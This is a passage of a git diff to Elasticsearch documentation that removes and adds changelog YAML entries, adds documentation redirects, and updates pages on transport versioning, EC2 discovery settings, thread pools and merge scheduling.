a/docs/changelog/128925.yaml b/docs/changelog/128925.yaml deleted file mode 100644 index dd41f7366ddd1..0000000000000 --- a/docs/changelog/128925.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128925 -summary: ES|QL - Add `match_phrase` full text function (tech preview) -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/128948.yaml b/docs/changelog/128948.yaml deleted file mode 100644 index a922104757083..0000000000000 --- a/docs/changelog/128948.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 128948 -summary: ES|QL - Add COMPLETION command as a tech preview feature -area: ES|QL -type: feature -issues: -- 124405 diff --git a/docs/changelog/128986.yaml b/docs/changelog/128986.yaml deleted file mode 100644 index 3b3e734536817..0000000000000 --- a/docs/changelog/128986.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 128986 -summary: Improve execution of terms queries over wildcard fields -area: Search -type: bug -issues: - - 128201 diff --git a/docs/changelog/129074.yaml b/docs/changelog/129074.yaml deleted file mode 100644 index 94e60079ea510..0000000000000 --- a/docs/changelog/129074.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129074 -summary: "[apm-data] Set `event.dataset` if empty for logs" -area: Data streams -type: bug -issues: [] diff --git a/docs/changelog/129089.yaml b/docs/changelog/129089.yaml deleted file mode 100644 index cd7c553026eea..0000000000000 --- a/docs/changelog/129089.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129089 -summary: Update `sparse_vector` field mapping to include default setting for token pruning -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/129122.yaml b/docs/changelog/129122.yaml deleted file mode 100644 index eaed27e326c0f..0000000000000 --- a/docs/changelog/129122.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129122 -summary: Update ecs@mappings.json with new GenAI fields -area: Data streams -type: 
feature -issues: [] diff --git a/docs/changelog/129126.yaml b/docs/changelog/129126.yaml deleted file mode 100644 index b719af9892ba3..0000000000000 --- a/docs/changelog/129126.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 129126 -summary: "Synthetic source: avoid storing multi fields of type text and `match_only_text`\ - \ by default" -area: Mapping -type: bug -issues: [] diff --git a/docs/changelog/129128.yaml b/docs/changelog/129128.yaml deleted file mode 100644 index 0bd52d4a6f86f..0000000000000 --- a/docs/changelog/129128.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129128 -summary: Add RemoveBlock API to allow `DELETE /{index}/_block/{block}` -area: Indices APIs -type: enhancement -issues: [] diff --git a/docs/changelog/129140.yaml b/docs/changelog/129140.yaml deleted file mode 100644 index e7ee59122c34f..0000000000000 --- a/docs/changelog/129140.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129140 -summary: Increment inference stats counter for shard bulk inference calls -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/129150.yaml b/docs/changelog/129150.yaml deleted file mode 100644 index 5e53f6f6a9171..0000000000000 --- a/docs/changelog/129150.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 129150 -summary: Add `none` chunking strategy to disable automatic chunking for inference - endpoints -area: Machine Learning -type: feature -issues: [] diff --git a/docs/changelog/129161.yaml b/docs/changelog/129161.yaml deleted file mode 100644 index a871fff01c9d7..0000000000000 --- a/docs/changelog/129161.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129161 -summary: Add Telemetry for models without adaptive allocations -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/129164.yaml b/docs/changelog/129164.yaml deleted file mode 100644 index 0d16fdf1b239e..0000000000000 --- a/docs/changelog/129164.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129164 -summary: Log partial failures -area: ES|QL -type: feature -issues: [] diff --git a/docs/changelog/129170.yaml b/docs/changelog/129170.yaml deleted file mode 100644 index 540dc5a50994d..0000000000000 --- a/docs/changelog/129170.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129170 -summary: Add Support for LIKE (LIST) -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/129181.yaml b/docs/changelog/129181.yaml deleted file mode 100644 index b19c2c8c32c30..0000000000000 --- a/docs/changelog/129181.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129181 -summary: Add Cluster Feature for L2 Norm -area: "Search" -type: bug -issues: [] diff --git a/docs/changelog/129200.yaml b/docs/changelog/129200.yaml deleted file mode 100644 index c657283682c4e..0000000000000 --- a/docs/changelog/129200.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129200 -summary: Simplified Linear Retriever -area: Search -type: enhancement -issues: [] diff --git a/docs/changelog/129223.yaml b/docs/changelog/129223.yaml deleted file mode 100644 index ec84ec52c8cf7..0000000000000 --- a/docs/changelog/129223.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129223 -summary: Fix text similarity reranker does not propagate min score correctly -area: Search -type: bug -issues: [] diff --git a/docs/changelog/129245.yaml b/docs/changelog/129245.yaml deleted file mode 100644 index 1a05e4340b4b3..0000000000000 --- a/docs/changelog/129245.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129245 -summary: Throttle indexing when disk IO throttling is disabled -area: Engine -type: enhancement -issues: [] diff --git a/docs/changelog/129278.yaml b/docs/changelog/129278.yaml deleted file 
mode 100644 index 567fc9e5696f0..0000000000000 --- a/docs/changelog/129278.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129278 -summary: Fix constant keyword optimization -area: ES|QL -type: bug -issues: [] diff --git a/docs/changelog/129302.yaml b/docs/changelog/129302.yaml deleted file mode 100644 index 061fb34ab28ba..0000000000000 --- a/docs/changelog/129302.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 129302 -summary: Move HTTP content aggregation from Netty into `RestController` -area: Network -type: enhancement -issues: - - 120746 diff --git a/docs/changelog/129325.yaml b/docs/changelog/129325.yaml deleted file mode 100644 index cbbb309dceee0..0000000000000 --- a/docs/changelog/129325.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 129325 -summary: Check for model deployment in inference endpoints before stopping -area: Machine Learning -type: bug -issues: - - 128549 diff --git a/docs/changelog/129326.yaml b/docs/changelog/129326.yaml deleted file mode 100644 index eb6bb3907bc50..0000000000000 --- a/docs/changelog/129326.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 129326 -summary: Check positions on `MultiPhraseQueries` as well as phrase queries -area: Search -type: bug -issues: - - 123871 diff --git a/docs/changelog/129359.yaml b/docs/changelog/129359.yaml deleted file mode 100644 index 9b1f6234d6579..0000000000000 --- a/docs/changelog/129359.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129359 -summary: Add min score linear retriever -area: Search -type: enhancement -issues: [] diff --git a/docs/changelog/129367.yaml b/docs/changelog/129367.yaml deleted file mode 100644 index a8e466158999e..0000000000000 --- a/docs/changelog/129367.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129367 -summary: Run `TransportGetStatusAction` on local node -area: ILM+SLM -type: enhancement -issues: [] diff --git a/docs/changelog/129370.yaml b/docs/changelog/129370.yaml deleted file mode 100644 index 73d1c25f4b34c..0000000000000 --- a/docs/changelog/129370.yaml +++ /dev/null @@ -1,7 +0,0 @@ -pr: 129370 -summary: Avoid dropping aggregate groupings in local plans -area: ES|QL -type: bug -issues: - - 129811 - - 128054 diff --git a/docs/changelog/129413.yaml b/docs/changelog/129413.yaml deleted file mode 100644 index 505b627c42b16..0000000000000 --- a/docs/changelog/129413.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129413 -summary: '`SageMaker` Elastic Payload' -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/129440.yaml b/docs/changelog/129440.yaml deleted file mode 100644 index f4999f8c627d3..0000000000000 --- a/docs/changelog/129440.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129440 -summary: Fix filtered knn vector search when query timeouts are enabled -area: Vector Search -type: bug -issues: [] diff --git a/docs/changelog/129454.yaml b/docs/changelog/129454.yaml deleted file mode 100644 index 538c5266c6162..0000000000000 --- a/docs/changelog/129454.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129454 -summary: Aggressive release of shard contexts -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/129455.yaml b/docs/changelog/129455.yaml deleted file mode 100644 index 688dcc1bc04df..0000000000000 --- a/docs/changelog/129455.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 129455 -summary: Prevent ILM from processing shrunken index before its execution state is copied over -area: ILM+SLM -type: bug -issues: - - 109206 diff --git a/docs/changelog/129503.yaml b/docs/changelog/129503.yaml deleted file mode 100644 index f91c08cd487e2..0000000000000 --- a/docs/changelog/129503.yaml +++ /dev/null @@ -1,6 
+0,0 @@ -pr: 129503 -summary: Pushdown Lookup Join past Project -area: ES|QL -type: enhancement -issues: - - 119082 diff --git a/docs/changelog/129507.yaml b/docs/changelog/129507.yaml deleted file mode 100644 index fa555433c34d6..0000000000000 --- a/docs/changelog/129507.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 129507 -summary: Using a temp `IndexService` for template validation -area: Indices APIs -type: bug -issues: - - 129473 diff --git a/docs/changelog/129509.yaml b/docs/changelog/129509.yaml deleted file mode 100644 index 859ad837a3c8d..0000000000000 --- a/docs/changelog/129509.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 129509 -summary: Fix NPE in `SemanticTextHighlighter` -area: Search -type: bug -issues: - - 129501 diff --git a/docs/changelog/129546.yaml b/docs/changelog/129546.yaml deleted file mode 100644 index 8cb57d8747925..0000000000000 --- a/docs/changelog/129546.yaml +++ /dev/null @@ -1,13 +0,0 @@ -pr: 129546 -summary: Upgrade to Lucene 10.2.2 -area: Search -type: upgrade -issues: [] -highlight: - title: Upgrade to lucene 10.2.2 - body: |- - * Reduce NeighborArray on-heap memory during HNSW graph building - * Fix IndexSortSortedNumericDocValuesRangeQuery for integer sorting - * ValueSource.fromDoubleValuesSource(dvs).getSortField() would throw errors when used if the DoubleValuesSource needed scores - ---- - notable: true diff --git a/docs/changelog/129557.yaml b/docs/changelog/129557.yaml deleted file mode 100644 index 99afe8e45b439..0000000000000 --- a/docs/changelog/129557.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129557 -summary: Pushdown for LIKE (LIST) -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/129600.yaml b/docs/changelog/129600.yaml deleted file mode 100644 index c97f08477f833..0000000000000 --- a/docs/changelog/129600.yaml +++ /dev/null @@ -1,7 +0,0 @@ -pr: 129600 -summary: Make flattened synthetic source concatenate object keys on scalar/object - mismatch -area: Mapping -type: bug -issues: - - 122936 diff --git a/docs/changelog/129606.yaml b/docs/changelog/129606.yaml deleted file mode 100644 index a3cd10626bc06..0000000000000 --- a/docs/changelog/129606.yaml +++ /dev/null @@ -1,35 +0,0 @@ -pr: 129606 -summary: Release FORK in tech preview -area: ES|QL -type: feature -issues: [] -highlight: - title: Release FORK in tech preview - body: |- - Fork is a foundational building block that allows multiple branches of execution. 
- Conceptually, fork is: - - a bifurcation of the stream, with all data going to each fork branch, followed by - - a merge of the branches, enhanced with a discriminator column called FORK: - - Example: - - [source,yaml] - ---------------------------- - FROM test - | FORK - ( WHERE content:"fox" ) - ( WHERE content:"dog" ) - | SORT _fork - ---------------------------- - - The FORK command add a discriminator column called `_fork`: - - [source,yaml] - ---------------------------- - | id | content | _fork | - |-----|-----------|-------| - | 3 | brown fox | fork1 | - | 4 | white dog | fork2 | - ---------------------------- - - notable: true diff --git a/docs/changelog/129647.yaml b/docs/changelog/129647.yaml deleted file mode 100644 index eec287179e294..0000000000000 --- a/docs/changelog/129647.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129647 -summary: Fix `PushQueriesIT.testLike()` fails -area: ES|QL -type: bug -issues: [] diff --git a/docs/changelog/129657.yaml b/docs/changelog/129657.yaml deleted file mode 100644 index 95fc3f8cd24d0..0000000000000 --- a/docs/changelog/129657.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 129657 -summary: Fix `PushQueryIT#testEqualityOrTooBig` -area: ES|QL -type: bug -issues: - - 129545 diff --git a/docs/changelog/129659.yaml b/docs/changelog/129659.yaml deleted file mode 100644 index 60fce08d58398..0000000000000 --- a/docs/changelog/129659.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129659 -summary: Simplified RRF Retriever -area: Search -type: enhancement -issues: [] diff --git a/docs/changelog/129738.yaml b/docs/changelog/129738.yaml deleted file mode 100644 index 38a33b5aefb3f..0000000000000 --- a/docs/changelog/129738.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129738 -summary: Watch SSL files instead of directories -area: TLS -type: bug -issues: [] diff --git a/docs/changelog/129884.yaml b/docs/changelog/129884.yaml deleted file mode 100644 index a3ae373f2dbd0..0000000000000 --- a/docs/changelog/129884.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129884 -summary: Move to the Cohere V2 API for new inference endpoints -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/129904.yaml b/docs/changelog/129904.yaml deleted file mode 100644 index f8945cac1d3c3..0000000000000 --- a/docs/changelog/129904.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129904 -summary: Reverse disordered-version warning message -area: Infra/Core -type: bug -issues: [] diff --git a/docs/changelog/129962.yaml b/docs/changelog/129962.yaml deleted file mode 100644 index dd06742a74791..0000000000000 --- a/docs/changelog/129962.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 129962 -summary: Simplified Linear & RRF Retrievers - Return error on empty fields param -area: Search -type: bug -issues: [] diff --git a/docs/changelog/130032.yaml b/docs/changelog/130032.yaml deleted file mode 100644 index 69140cdc3f83c..0000000000000 --- a/docs/changelog/130032.yaml +++ /dev/null @@ -1,12 +0,0 @@ -pr: 130032 -summary: ES|QL cross-cluster querying is now generally available -area: ES|QL -type: feature -issues: [] -highlight: - title: ES|QL cross-cluster querying is now generally available - body: |- - The ES|QL Cross-Cluster querying feature has been in technical preview since 8.13. - As of releases 8.19.0 and 9.1.0 this is now generally available. - This feature allows you to run ES|QL queries across multiple clusters. 
- notable: true diff --git a/docs/changelog/130083.yaml b/docs/changelog/130083.yaml deleted file mode 100644 index 1b32881659531..0000000000000 --- a/docs/changelog/130083.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 130083 -summary: Fix timeout bug in DBQ deletion of unused and orphan ML data -area: Machine Learning -type: bug -issues: [] diff --git a/docs/changelog/132853.yaml b/docs/changelog/132853.yaml new file mode 100644 index 0000000000000..ee60d04bbd3a8 --- /dev/null +++ b/docs/changelog/132853.yaml @@ -0,0 +1,5 @@ +pr: 132853 +summary: Bump bcpkix version +area: Security +type: upgrade +issues: [] diff --git a/docs/changelog/133080.yaml b/docs/changelog/133080.yaml new file mode 100644 index 0000000000000..78b6f579f5959 --- /dev/null +++ b/docs/changelog/133080.yaml @@ -0,0 +1,5 @@ +pr: 133080 +summary: "Disallow creating `semantic_text` fields in indices created prior to 8.11.0" +area: Relevance +type: bug +issues: [] diff --git a/docs/changelog/133198.yaml b/docs/changelog/133198.yaml new file mode 100644 index 0000000000000..8e664e571122c --- /dev/null +++ b/docs/changelog/133198.yaml @@ -0,0 +1,5 @@ +pr: 133198 +summary: Bump bc-fips to 1.0.2.6 +area: FIPS +type: upgrade +issues: [] diff --git a/docs/changelog/133392.yaml b/docs/changelog/133392.yaml new file mode 100644 index 0000000000000..da39ae520a8ae --- /dev/null +++ b/docs/changelog/133392.yaml @@ -0,0 +1,5 @@ +pr: 133392 +summary: Track memory in evaluators +area: ES|QL +type: bug +issues: [] diff --git a/docs/changelog/133424.yaml b/docs/changelog/133424.yaml new file mode 100644 index 0000000000000..6b89c4ec44173 --- /dev/null +++ b/docs/changelog/133424.yaml @@ -0,0 +1,5 @@ +pr: 133424 +summary: Ensuring only a single request executor object is created +area: Machine Learning +type: bug +issues: [] diff --git a/docs/changelog/133604.yaml b/docs/changelog/133604.yaml new file mode 100644 index 0000000000000..dd7be06544cce --- /dev/null +++ b/docs/changelog/133604.yaml @@ -0,0 +1,5 @@ +pr: 133604 +summary: Update `DefBootstrap` to handle Error from `ClassValue` +area: Infra/Scripting +type: bug +issues: [] diff --git a/docs/changelog/133611.yaml b/docs/changelog/133611.yaml new file mode 100644 index 0000000000000..9b86f75d9d276 --- /dev/null +++ b/docs/changelog/133611.yaml @@ -0,0 +1,6 @@ +pr: 133611 +summary: Allow trailing empty string field names in paths of flattened field +area: Mapping +type: bug +issues: + - 130139 diff --git a/docs/changelog/133671.yaml b/docs/changelog/133671.yaml new file mode 100644 index 0000000000000..ee16f659e9b27 --- /dev/null +++ b/docs/changelog/133671.yaml @@ -0,0 +1,5 @@ +pr: 133671 +summary: Remove `java.xml` from system modules +area: Infra/Core +type: bug +issues: [] diff --git a/docs/changelog/133680.yaml b/docs/changelog/133680.yaml new file mode 100644 index 0000000000000..c99beb5a1040a --- /dev/null +++ b/docs/changelog/133680.yaml @@ -0,0 +1,5 @@ +pr: 133680 +summary: Fix enrich caches outdated value after policy run +area: Ingest Node +type: bug +issues: [] diff --git a/docs/changelog/133681.yaml b/docs/changelog/133681.yaml new file mode 100644 index 0000000000000..6231eec2a5235 --- /dev/null +++ b/docs/changelog/133681.yaml @@ -0,0 +1,6 @@ +pr: 133681 +summary: Remove `DocumentSubsetBitsetCache` locking +area: Authorization +type: bug +issues: + - 132842 diff --git a/docs/changelog/133737.yaml b/docs/changelog/133737.yaml new file mode 100644 index 0000000000000..50fefa93f4871 --- /dev/null +++ b/docs/changelog/133737.yaml @@ -0,0 +1,6 @@ +pr: 133737 +summary: "KQL: 
Support boolean operators in field queries" +area: Search +type: bug +issues: + - 132366 diff --git a/docs/changelog/133752.yaml b/docs/changelog/133752.yaml new file mode 100644 index 0000000000000..784d6e2afa370 --- /dev/null +++ b/docs/changelog/133752.yaml @@ -0,0 +1,5 @@ +pr: 133752 +summary: Avoid stale enrich results after policy execution +area: Ingest Node +type: bug +issues: [] diff --git a/docs/changelog/133775.yaml b/docs/changelog/133775.yaml new file mode 100644 index 0000000000000..1bdecce846d9f --- /dev/null +++ b/docs/changelog/133775.yaml @@ -0,0 +1,5 @@ +pr: 133775 +summary: Remove Transfer-Encoding from HTTP request with no content +area: Network +type: bug +issues: [] diff --git a/docs/changelog/133793.yaml b/docs/changelog/133793.yaml new file mode 100644 index 0000000000000..6bf73ecaa060c --- /dev/null +++ b/docs/changelog/133793.yaml @@ -0,0 +1,6 @@ +pr: 133793 +summary: "[Sentinel One] Add `manage`, `create_index`, `read`, `index`, `write`, `delete`, permission for third party agent indices `kibana_system`" +area: Authorization +type: enhancement +issues: + - 133703 diff --git a/docs/changelog/133848.yaml b/docs/changelog/133848.yaml new file mode 100644 index 0000000000000..107513d21555b --- /dev/null +++ b/docs/changelog/133848.yaml @@ -0,0 +1,5 @@ +pr: 133848 +summary: Delay S3 repo warning if default region absent +area: Snapshot/Restore +type: bug +issues: [] diff --git a/docs/changelog/133919.yaml b/docs/changelog/133919.yaml new file mode 100644 index 0000000000000..34c3ecd3ebe57 --- /dev/null +++ b/docs/changelog/133919.yaml @@ -0,0 +1,5 @@ +pr: 133919 +summary: Fix double-counting of inference memory in the assignment rebalancer +area: Machine Learning +type: bug +issues: [] diff --git a/docs/docset.yml b/docs/docset.yml index 15bd674a5fb5e..dbaf687dbb832 100644 --- a/docs/docset.yml +++ b/docs/docset.yml @@ -13,6 +13,7 @@ cross_links: - docs-content - ecs - eland + - elasticsearch - elasticsearch-hadoop - elasticsearch-java - elasticsearch-js diff --git a/docs/internal/Versioning.md b/docs/internal/Versioning.md index b60f1ad9c2bc0..4a887f4caca86 100644 --- a/docs/internal/Versioning.md +++ b/docs/internal/Versioning.md @@ -109,12 +109,12 @@ This is an optional cleanup step that is never required for correctness. The transport version used between two nodes is determined by the initial handshake (see `TransportHandshaker`, where the two nodes swap their highest known transport version). The lowest transport version that is compatible with the current node -is determined by `TransportVersions.MINIMUM_COMPATIBLE`, +is determined by `TransportVersion.minimumCompatible()`, and the node is prevented from joining the cluster if it is below that version. This constant should be updated manually on a major release. The minimum version that can be used for CCS is determined by -`TransportVersions.MINIMUM_CCS_VERSION`, but this is not actively checked +`TransportVersion.minimumCCSVersion()`, but this is not actively checked before queries are performed. Only if a query cannot be serialized at that version is an action rejected. This constant is updated automatically as part of performing a release. 
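An illustrative sketch of how to observe the versioning notes above in practice, assuming the `transport_version` field that recent {{es}} versions report in the nodes info API (the `filter_path` parameter merely trims the response and is a convenience, not a requirement):

```console
GET /_nodes?filter_path=nodes.*.name,nodes.*.transport_version
```

Each node reports its own highest known transport version; per the handshake described above, any two nodes then communicate using the lower of the two values they swap.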
diff --git a/docs/redirects.yml b/docs/redirects.yml new file mode 100644 index 0000000000000..d8e62f9a121e4 --- /dev/null +++ b/docs/redirects.yml @@ -0,0 +1,86 @@ +redirects: + # Related to https://github.com/elastic/elasticsearch/pull/130716/ + 'reference/query-languages/eql/eql-ex-threat-detection.md': 'docs-content://explore-analyze/query-filter/languages/example-detect-threats-with-eql.md' + + # https://github.com/elastic/elasticsearch/pull/131385 + 'reference/elasticsearch/rest-apis/retrievers.md': + to: 'reference/elasticsearch/rest-apis/retrievers.md' + anchors: {} # pass-through unlisted anchors in the `many` ruleset + many: + - to: 'reference/elasticsearch/rest-apis/retrievers/standard-retriever.md' + anchors: {'standard-retriever'} + - to: 'reference/elasticsearch/rest-apis/retrievers/knn-retriever.md' + anchors: {'knn-retriever'} + - to: 'reference/elasticsearch/rest-apis/retrievers/linear-retriever.md' + anchors: {'linear-retriever'} + - to: 'reference/elasticsearch/rest-apis/retrievers/rrf-retriever.md' + anchors: {'rrf-retriever'} + - to: 'reference/elasticsearch/rest-apis/retrievers/rescorer-retriever.md' + anchors: {'rescorer-retriever'} + - to: 'reference/elasticsearch/rest-apis/retrievers/text-similarity-reranker-retriever.md' + anchors: {'text-similarity-reranker-retriever'} + - to: 'reference/elasticsearch/rest-apis/retrievers/rule-retriever.md' + anchors: {'rule-retriever'} + - to: 'reference/elasticsearch/rest-apis/retrievers/pinned-retriever.md' + anchors: {'pinned-retriever'} + + # ESQL command redirects - split from aggregate pages to individual pages + 'reference/query-languages/esql/commands/source-commands.md': + to: 'reference/query-languages/esql/commands/source-commands.md' + anchors: {} # pass-through unlisted anchors in the `many` ruleset + many: + - to: 'reference/query-languages/esql/commands/from.md' + anchors: {'esql-from'} + - to: 'reference/query-languages/esql/commands/row.md' + anchors: {'esql-row'} + - to: 'reference/query-languages/esql/commands/show.md' + anchors: {'esql-show'} + + # Handle old anchor references to esql-commands.md + 'reference/query-languages/esql/esql-commands.md': + to: 'reference/query-languages/esql/esql-commands.md' + anchors: {} # pass-through unlisted anchors in the `many` ruleset + many: + - to: 'reference/query-languages/esql/commands/source-commands.md' + anchors: {'esql-source-commands'} + - to: 'reference/query-languages/esql/commands/processing-commands.md' + anchors: {'esql-processing-commands'} + + 'reference/query-languages/esql/commands/processing-commands.md': + to: 'reference/query-languages/esql/commands/processing-commands.md' + anchors: {} # pass-through unlisted anchors in the `many` ruleset + many: + - to: 'reference/query-languages/esql/commands/change-point.md' + anchors: {'esql-change_point'} + - to: 'reference/query-languages/esql/commands/completion.md' + anchors: {'esql-completion'} + - to: 'reference/query-languages/esql/commands/dissect.md' + anchors: {'esql-dissect'} + - to: 'reference/query-languages/esql/commands/drop.md' + anchors: {'esql-drop'} + - to: 'reference/query-languages/esql/commands/enrich.md' + anchors: {'esql-enrich'} + - to: 'reference/query-languages/esql/commands/eval.md' + anchors: {'esql-eval'} + - to: 'reference/query-languages/esql/commands/fork.md' + anchors: {'esql-fork'} + - to: 'reference/query-languages/esql/commands/grok.md' + anchors: {'esql-grok'} + - to: 'reference/query-languages/esql/commands/keep.md' + anchors: {'esql-keep'} + - to: 
'reference/query-languages/esql/commands/limit.md' + anchors: {'esql-limit'} + - to: 'reference/query-languages/esql/commands/lookup-join.md' + anchors: {'esql-lookup-join'} + - to: 'reference/query-languages/esql/commands/mv_expand.md' + anchors: {'esql-mv_expand'} + - to: 'reference/query-languages/esql/commands/rename.md' + anchors: {'esql-rename'} + - to: 'reference/query-languages/esql/commands/sample.md' + anchors: {'esql-sample'} + - to: 'reference/query-languages/esql/commands/sort.md' + anchors: {'esql-sort'} + - to: 'reference/query-languages/esql/commands/stats-by.md' + anchors: {'esql-stats-by'} + - to: 'reference/query-languages/esql/commands/where.md' + anchors: {'esql-where'} diff --git a/docs/reference/elasticsearch-plugins/discovery-ec2-usage.md b/docs/reference/elasticsearch-plugins/discovery-ec2-usage.md index b5a69bb65f368..3c15b853d428d 100644 --- a/docs/reference/elasticsearch-plugins/discovery-ec2-usage.md +++ b/docs/reference/elasticsearch-plugins/discovery-ec2-usage.md @@ -1,4 +1,6 @@ --- +applies_to: + stack: ga mapped_pages: - https://www.elastic.co/guide/en/elasticsearch/plugins/current/discovery-ec2-usage.html --- @@ -45,6 +47,9 @@ The available settings for the EC2 discovery plugin are as follows. `discovery.ec2.endpoint` : The EC2 service endpoint to which to connect. See [https://docs.aws.amazon.com/general/latest/gr/rande.html#ec2_region](https://docs.aws.amazon.com/general/latest/gr/rande.html#ec2_region) to find the appropriate endpoint for the region. This setting defaults to `ec2.us-east-1.amazonaws.com` which is appropriate for clusters running in the `us-east-1` region. +`discovery.ec2.protocol` {applies_to}`stack: deprecated 9.1` +: The protocol to use to connect to the EC2 service endpoint, which may be either `http` or `https`. Defaults to `https`. This setting has no effect in version 9.1 and higher. + `discovery.ec2.proxy.host` : The address or host name of an HTTP proxy through which to connect to EC2. If not set, no proxy is used. diff --git a/docs/reference/elasticsearch/configuration-reference/thread-pool-settings.md b/docs/reference/elasticsearch/configuration-reference/thread-pool-settings.md index 8314ff41bdc59..2243e2decb448 100644 --- a/docs/reference/elasticsearch/configuration-reference/thread-pool-settings.md +++ b/docs/reference/elasticsearch/configuration-reference/thread-pool-settings.md @@ -59,8 +59,11 @@ $$$search-throttled$$$`search_throttled` `flush` : For [flush](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-flush) and [translog](/reference/elasticsearch/index-settings/translog.md) `fsync` operations. Thread pool type is `scaling` with a keep-alive of `5m` and a default maximum size of `min(5, (`[`# of allocated processors`](#node.processors)`) / 2)`. +`merge` +: For [merge](https://www.elastic.co/guide/en/elasticsearch/reference/current/index-modules-merge.html) operations of all the shards on the node. Thread pool type is `scaling` with a keep-alive of `5m` and a default maximum size of [`# of allocated processors`](#node.processors). + `force_merge` -: For [force merge](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-forcemerge) operations. Thread pool type is `fixed` with a size of `max(1, (`[`# of allocated processors`](#node.processors)`) / 8)` and an unbounded queue size. +: For waiting on blocking [force merge](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-forcemerge) operations.
Thread pool type is `fixed` with a size of `max(1, (`[`# of allocated processors`](#node.processors)`) / 8)` and an unbounded queue size. `management` : For cluster management. Thread pool type is `scaling` with a keep-alive of `5m` and a default maximum size of `5`. @@ -81,7 +84,7 @@ $$$search-throttled$$$`search_throttled` : For [watch executions](docs-content://explore-analyze/alerts-cases/watcher.md). Thread pool type is `fixed` with a default maximum size of `min(5 * (`[`# of allocated processors`](#node.processors)`), 50)` and queue_size of `1000`. $$$modules-threadpool-esql$$$`esql_worker` -: Executes [{{esql}}](docs-content://explore-analyze/query-filter/languages/esql.md) operations. Thread pool type is `fixed` with a size of `int((`[`# of allocated processors`](#node.processors) ` * 3) / 2) + 1`, and queue_size of `1000`. +: Executes [{{esql}}](/reference/query-languages/esql.md) operations. Thread pool type is `fixed` with a size of `int((`[`# of allocated processors`](#node.processors) ` * 3) / 2) + 1`, and queue_size of `1000`. Thread pool settings are [Static](docs-content://deploy-manage/stack-settings.md#static-cluster-setting) and can be changed by editing `elasticsearch.yml`. Changing a specific thread pool can be done by setting its type-specific parameters; for example, changing the number of threads in the `write` thread pool: diff --git a/docs/reference/elasticsearch/index-settings/merge.md b/docs/reference/elasticsearch/index-settings/merge.md index b5b6d10f7defe..c318fab3a5977 100644 --- a/docs/reference/elasticsearch/index-settings/merge.md +++ b/docs/reference/elasticsearch/index-settings/merge.md @@ -13,10 +13,32 @@ The merge process uses auto-throttling to balance the use of hardware resources ## Merge scheduling [merge-scheduling] -The merge scheduler (ConcurrentMergeScheduler) controls the execution of merge operations when they are needed. Merges run in separate threads, and when the maximum number of threads is reached, further merges will wait until a merge thread becomes available. +The merge scheduler controls the execution of merge operations when they are needed. +Merges run on the dedicated `merge` thread pool. +Smaller merges are prioritized over larger ones, across all shards on the node. +Merges are disk-IO throttled so that bursts, which occur while merging activity is otherwise low, are smoothed out and do not impact indexing throughput. +There is no limit on the number of merges that can be enqueued for execution on the thread pool. +However, beyond a certain per-shard limit, once merging has become completely unthrottled for disk IO, indexing for the shard will itself be throttled until merging catches up. -The merge scheduler supports the following *dynamic* setting: +The available disk space is monitored periodically, and no new merge tasks are scheduled for execution when the available disk space is low. +This prevents the temporary disk space that is required while merges execute from completely filling up the disk space on the node. + +The merge scheduler supports the following *dynamic* settings: `index.merge.scheduler.max_thread_count` -: The maximum number of threads on a single shard that may be merging at once. Defaults to `Math.max(1, Math.min(4, <> / 2))` which works well for a good solid-state-disk (SSD). If your index is on spinning platter drives instead, decrease this to 1. +: The maximum number of threads on a **single** shard that may be merging at once.
